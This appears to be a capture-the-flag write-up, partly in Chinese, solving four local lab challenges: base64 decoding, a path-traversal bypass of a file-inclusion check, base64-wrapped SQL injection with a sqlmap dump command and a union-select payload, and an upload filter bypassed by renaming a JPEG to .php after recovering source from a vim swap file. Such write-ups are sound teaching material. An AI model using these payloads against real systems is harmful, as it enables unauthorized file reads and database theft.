CTF | Note

签。。签到题？

你想要什么？告诉我

http://127.0.0.1:30004

1. input ‘flag’
2. get ZmxhZ3tXZWxDMG1lX3RvX2N0ZjJ9
3. base64.decode(ZmxhZ3tXZWxDMG1lX3RvX2N0ZjJ9)
4. get “flag{WelC0me_to_ctf2}”

文。。文件包含？

嘻嘻，我是flag，来包我啊~~

http://127.0.0.1:30005/page.php

1. Index page
   This index page
   another page

2. This is another page
   This is another page
   But nothing
   return index page

3. observe url get file bypass

   • inspect source code

   • find

     john@ubuntu:/var/www$ tree
     .
     ├── flag
     └── html
       ├──page.php
       ├──index
       ├──another
     <!--
     if (strpos($file_path, ".") === 0 || substr_count($file_path, "..") > 2) {
       echo "<p>malicious parameter</>
     }
     

   • constract file bypass
     http://127.0.0.1:30005/page.php?file=/html/../flag

4. get flag

   flag{Bypass_File_Path_Check}

S。。SQL注入？

听说flag表的value字段里面有好东西。。

http://127.0.0.1:30006/?id=MQ==

1. base64.decode(MQ== ) = 1

2. use sqlmap

    sqlmap.py -u"http://127.0.0.1:30006/?id=NA=="  --tamper base64encode.py -b --current-user --current-db  --tables  --columns --dump-all
   

3. common method

   • id= 1 union select 1,value from flag
   • base64.encode(id=1 union select 1,value from flag)
     = MSAgdW5pb24gc2VsZWN0IDEsdmFsdWUgZnJvbSBmbGFn
   • http://127.0.0.1:30006/?id=MSAgdW5pb24gc2VsZWN0IDEsdmFsdWUgZnJvbSBmbGFn

4. get flag

   flag{Have_Fun_In_SQL_Injection}

Upload and get flag

听说编辑文件的时候突然断电会产生swp文件呢~

http://127.0.0.1:30007/

http://127.0.0.1:30007/index.php
http://127.0.0.1:30007/.index.php.swp

curl -o .index.php.swp http://127.0.0.1:30007/.index.php.swp
vim -r .index.php.swp

if ($_FILES){
    if ($_FILES["file"]["error"] > 0)
    {
        echo "Error: " . $_FILES["file"]["error"] . "<br />";
    }
    else
    {
        if ($_FILES["file"]["type"] !== "image/jpeg"){
            die("stop hacking!");
        }
        if ($_FILES["file"]["size"] / 1024 > 2048){
            die("size too big!");
        }
        $file_tmp = fopen($_FILES["file"]["tmp_name"], 'rb');
        $bin = fread($file_tmp, 2);
        fclose($file_tmp);
        $data = unpack('C2chars', $bin);
        $type_code = intval($data['chars1'].$data['chars2']);
        $flag = 0;
        switch ($type_code) {
            case 255216:
                $fileType = 'jpg';
                $flag = 1;
                break;
            case 13780:
                $fileType = 'png';
                $flag = 1;
                break;
            default:
                $fileType = 'unknown';
                die("error file head!");
                break;
        }
        if ($flag === 1){
            $filetype = substr($_FILES["file"]["name"], strrpos($_FILES["file"]["name"], '.'));
            $filename = md5($_FILES["file"]["name"]) . $filetype;
            if (strtolower($filetype) === ".php"){
                copy('../flag', $filename);
            }else{
                move_uploaded_file($_FILES["file"]["tmp_name"], $filename);
            }
            echo "<h1>成功</h1>";
        }
    }

All Summary

1. upload php file

   • use burp suite modify filename Junyangz.jpg to Junyangz.php

2. get file location

   • analyse index.php by .index.php.swp
   • get the file name :

     $filename = md5($_FILES[“file”][“name”]) . $filetype;

   • MD5.hash(Junyangz.php)=f0480f39a6cb1a1ff5f55021ac0824f7
   • as f0480f39a6cb1a1ff5f55021ac0824f7.php

3. get flag:

   • http://127.0.0.1:30007/f0480f39a6cb1a1ff5f55021ac0824f7.php

   • flag{Upl0ad_w1lL_get_fl4g}